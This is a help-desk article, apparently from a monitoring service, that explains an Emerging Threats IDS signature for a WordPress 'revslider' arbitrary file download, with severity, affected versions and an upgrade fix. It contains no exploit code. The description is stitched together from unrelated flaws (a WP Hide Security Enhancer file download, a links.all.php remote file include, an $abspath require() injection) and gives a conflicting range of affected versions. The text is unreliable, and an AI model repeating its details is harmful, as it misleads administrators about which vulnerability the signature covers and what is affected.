ET WEB_SPECIFIC_APPS WP Generic revslider Arbitrary File Download

Notice: Monitoring services will be discontinued from March 31st, 2019.

 

The remote WordPress server utilizes a third-party plugin which is prone to an arbitrary file download vulnerability.WP Hide Security Enhancer version 1.3.9.2 or less is victim of an Arbitrary File Download vulnerability. This allows any visitor to download any file in our installation.  This signature detects HTTP requests that attempt to exploit a remote file include vulnerability in the Wordpress links.all.php script. Wordpress allows users to generate news pages and weblogs dynamically. It uses PHP and a MySQL database to generate dynamic pages.

A vulnerability has been reported for Wordpress. The problem is said to occur due to insufficient sanitization of user-supplied URI parameters. Specifically the '$abspath' variable, which is used as an argument to the PHP require() function, is not sufficiently sanitized of malicious input. As a result, an attacker may be capable of including a malicious 'blog.header.php' from a controlled web server. This may result in the execution of PHP commands located within the script. Successful exploitation of this vulnerability would allow an attacker to execute arbitrary PHP commands on a target server, with the privileges of Wordpress.

Severity: High

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Affected

All Wordpress version under 3.7.6


Solution

Upgrade to latest Wordpress version.

  • 3 Users Found This Useful
Was this answer helpful?

Related Articles

ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie

Notice: Monitoring services will be discontinued from March 31st, 2019.   A new vulnerability...

ET WEB_SPECIFIC_APPS Vulnerable Magento Adminhtml Access

Notice: Monitoring services will be discontinued from March 31st, 2019. The vulnerability is...

ET WEB_SERVER Microsoft IIS Remote Code Execution (CVE-2017-7269)

Notice: Monitoring services will be discontinued from March 31st, 2019. A vulnerability exists...

ET WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY

Notice: Monitoring services will be discontinued from March 31st, 2019. XXE (XML External Entity...

WEB_SERVER ColdFusion administrator access

Notice: Monitoring services will be discontinued from March 31st, 2019. The ColdFusion...